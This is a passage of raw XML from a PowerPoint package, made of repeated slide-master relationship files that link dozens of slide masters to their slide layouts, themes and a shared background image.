Target="../slideLayouts/slideLayout502.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme51.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout510.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout501.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster52.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout519.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout518.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout517.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout516.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout515.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout514.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout513.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout512.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme52.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout520.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout511.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster53.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout529.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout528.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout527.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout526.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout525.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout524.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout523.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout522.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme53.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout530.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout521.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster54.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout539.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout538.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout537.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout536.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout535.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout534.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout533.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout532.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme54.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout540.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout531.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster55.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout549.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout548.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout547.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout546.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout545.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout544.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout543.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout542.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme55.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout550.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout541.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster56.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout559.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout558.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout557.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout556.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout555.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout554.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout553.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout552.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme56.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout560.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout551.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster57.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout569.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout568.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout567.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout566.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout565.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout564.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout563.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout562.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme57.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout570.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout561.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster58.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout579.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout578.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout577.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout576.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout575.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout574.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout573.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout572.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme58.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout580.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout571.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster59.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout589.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout588.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout587.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout586.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout585.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout584.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout583.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout582.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme59.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout590.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout58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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme6.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><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0.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout599.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout598.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout597.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout596.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout595.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout594.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout593.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout592.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme60.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout600.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout591.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster61.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout609.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout608.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout607.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout606.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout605.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout604.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout603.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout602.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme61.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout610.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout601.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster62.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout619.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout618.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout617.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout616.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout615.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout614.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout613.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout612.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme62.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout620.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout611.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster63.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout629.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout628.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout627.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout626.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout625.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout624.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout623.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout622.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme63.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout630.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout621.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster64.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout639.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout638.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout637.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout636.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout635.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout634.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout633.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout632.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme64.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout640.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout631.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster65.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout649.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout648.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout647.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout646.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout645.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout644.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout643.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout642.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme65.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout650.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout641.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster66.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout659.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout658.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout657.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout656.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout655.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout654.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout653.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout652.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme66.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout660.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout651.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster67.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout669.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout668.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout667.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout666.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout665.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout664.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" 